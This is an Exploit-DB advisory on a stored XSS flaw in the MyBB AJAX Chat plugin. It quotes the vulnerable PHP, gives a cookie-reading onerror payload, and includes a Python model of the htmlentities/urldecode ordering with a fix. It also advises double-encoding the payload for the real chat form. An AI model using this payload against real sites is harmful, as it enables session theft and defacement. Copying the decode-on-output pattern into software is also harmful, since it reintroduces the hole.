MyBB AJAX Chat - Persistent XSS Vulnerability

ID EDB-ID:23354
Type exploitdb
Reporter Mr. P-teo
Modified 2012-12-13T00:00:00


MyBB AJAX Chat - Persistent XSS Vulnerability. Webapps exploit for php platform

# Title: MyBB AJAX Chat Persistent XSS Vulnerability
# Date: 12/12/2012
# Exploit Author: Mr. P-teo
# Vendor Homepage:
# Software Link:
# Version: 1
# Tested on: Windows

The Persistent XSS vulnerability lies within the chat_frame.php page.

*************************************** Persistent / Stored XSS **************************************

Although the message is filtered with the htmlentities() call below when it is stored:

	$db->insert_query($tbl, array('uid' => $mybb->user['uid'], 'message' => $db->escape_string(htmlentities($message)), 'date' => time()));


The vulnerability comes from the urldecode() call on the output path. URL encoding uses only '%', letters and digits, none of which htmlentities() rewrites, so a percent-encoded payload is stored unchanged and urldecode() turns it back into live markup when the message is rendered:

	$msg = urldecode($row["message"]);


The vulnerability can be exploited with a URL-encoded message that urldecode() turns back into the following markup:

	"><img src="XSS" onerror="alert(document.cookie)" />
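The following is an added example, not part of the original advisory or the plugin's code. It models the filter ordering described above in Python: html.escape() stands in for PHP's htmlentities() (it encodes the same characters relevant here, & < > ", plus the single quote), and urllib.parse.unquote() stands in for urldecode(). The function names and the store/render split are this example's own assumptions about chat_frame.php, chosen to mirror the two lines quoted above. It shows that the raw payload is neutralised, that the percent-encoded payload survives storage and is restored on output, and that encoding after decoding closes the hole.

```python
"""Model of the MyBB AJAX Chat filter ordering: htmlentities() on the way in,
urldecode() on the way out. Added example, not the plugin's code."""
import html
from urllib.parse import quote, unquote

# Decoded payload from the advisory (constructed test input).
PAYLOAD = '"><img src="XSS" onerror="alert(document.cookie)" />'


def php_htmlentities(s: str) -> str:
    # Stand-in for PHP htmlentities(): encodes & < > " (and ' which PHP's
    # pre-8.1 default flags leave alone; irrelevant to this bypass).
    return html.escape(s, quote=True)


def store_message(message: str) -> str:
    """Assumed insert path: htmlentities() applied before the row is written.
    escape_string() only protects the SQL statement, it does not alter the text."""
    return php_htmlentities(message)


def render_vulnerable(stored: str) -> str:
    """Assumed original output path: urldecode() on the stored text, no re-encoding."""
    return unquote(stored)


def render_fixed(stored: str) -> str:
    """Hardened output path: if decoding is really required, encode *after* it,
    so whatever urldecode() produces is never emitted as markup."""
    return php_htmlentities(unquote(stored))


def url_encode_payload(p: str) -> str:
    # Percent-encode every reserved character so nothing htmlentities() cares
    # about survives in the stored message.
    return quote(p, safe="")


def is_neutralised(out: str) -> bool:
    """True if the rendered text can no longer open a tag or attribute."""
    return "<" not in out and ">" not in out and '"' not in out


def demo() -> dict:
    encoded = url_encode_payload(PAYLOAD)
    return {
        # Plain payload: htmlentities() wins, output is inert.
        "raw_vulnerable": render_vulnerable(store_message(PAYLOAD)),
        # Percent-encoded payload: stored untouched, urldecode() restores it.
        "encoded_vulnerable": render_vulnerable(store_message(encoded)),
        # Same payload through the hardened renderer: inert again.
        "encoded_fixed": render_fixed(store_message(encoded)),
    }


if __name__ == "__main__":
    for name, out in demo().items():
        print(f"{name:20s} neutralised={is_neutralised(out)!s:5s} {out}")
```

When sending the payload through the real chat form rather than this model, remember that PHP already URL-decodes a form-encoded request body once, so the message has to be percent-encoded twice for the stored text to contain the single-encoded form that urldecode() later expands.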


This can be extended to defacement and similar attacks; alert() is only a basic proof of concept.

Brought to you by Mr. P-teo.